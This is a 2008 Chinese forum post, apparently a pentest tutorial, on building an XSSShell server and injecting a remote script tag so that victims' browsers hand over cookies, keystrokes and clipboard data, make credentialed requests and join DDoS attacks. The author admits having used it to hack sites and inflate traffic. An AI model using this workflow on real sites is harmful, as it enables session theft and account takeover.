xss测试步骤优化
xss测试的一般步骤,总结了一下,尽量让xss测试的步骤简单高效一些。测试xss一直很麻烦,一直想找个方法优化一下,经过几天的探索。终于找到了一个省时省力的方法。
首先介绍一下需要的工具。
xssshell是一个xss攻击平台。它首先需要搭建一个asp web服务器,将自身搭建起来,监听请求,
然后在xss地方,嵌入一个外部脚本文件,这个脚本文件会定期的访问xssshell服务器上的文件内容,然后执行。
这样就可以通过xssshell本身的服务,来动态的修改xss语句。(以前曾用这个黑过网站,刷过流量)
网上也有另一个xss攻击平台,是beEF,linux上的,因为搭建比较复杂,就不提了。如果需要更好的功能,可以尝试一下。
我的虚拟机是vpc,对linux的支持不好,没有办法。暂时不研究那个了。
第一步,搭建xssshell,首先下载xssshell,
官方地址http://www.portcullis-security.com/16.php
修改默认的密码和数据库文件的路径,然后自己搭建一个简易的web服务器,可以使用net box搭建。
搭建好后,就可以访问管理员页面,查看其中的功能。
具体的功能包括
getCookie()
Get victims active cookie
getSelfHtml()
Get victim's current page HTML Code
alert(<message>)
Send message to victim
eval(<javascript code>)
Execute virtually anything in JS
prompt(<question>)
Play Truth or Dare
getKeyloggerData()
Get keylogger data
getMouseLog()
Get mouse log (every click in screen)
getClipboard()
Get clipboard data (only IE)
getInternalIP()
Get internal IP address (only Mozilla* + JVM)
checkVisitedLinks(<url list>)
Check victim's history (seperated by new line)
getPage(<Relative URL Path>)
Make a request with victim credentials
DDoS(<url>)
Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)
Crash()
Consume victim's CPU and force to crash/close.
GetLocation()
Get current URL of victim.
同时xssshell提供了一个实例程序,请参考具体的说明。
第二步,在目标xss页面中,想办法嵌入一个外部的脚本链接,也就是加入
<script src="你的xssshell.asp的网络地址"></script>,这样就可以了。
第三步,登录xssshell的后台管理页面,就可以发现,有个计算机上线了,而且还提示基本的国家标志。浏览器类型。
然后,你就可以对主机进行各种功能的请求。比如发送消息,获得cookie,执行脚本,访问网页等等操作。
第四步,此步是高级应用。使用XSSTunnel,详细功能可以参考官方的说明,可以通过xss进行一些服务请求。因为这些请求时通过xss进行的。所以,获得的权限和身份也是以对方的身份进行的。如果是网站的管理员点击了你的xss页面,那么,你就可以在本地通过xssstunnel进行一些管理员的操作。
xss测试的目的就是让开发人员相信,xss能够引起的足够危害。所以,只要达到自己的目标就可以了。
比如演示通过xss获得管理员权限,然后执行管理员操作。利用xss手机受害者的敏感信息等。到此为止就已经达到了测试的要求了,再深入就成hack了。
第一步是个一劳永逸的工作,测试的时候,主要就是在xss处嵌入脚本,然后等待受害者上线就可以了。
这样就精简了很多的流程,和一些重复的体力活。
[ 本帖最后由 sihanjishu 于 2008-8-22 13:37 编辑 ] 非常感谢,无意中发现的。等有环境了就搭建看看
页:
[1]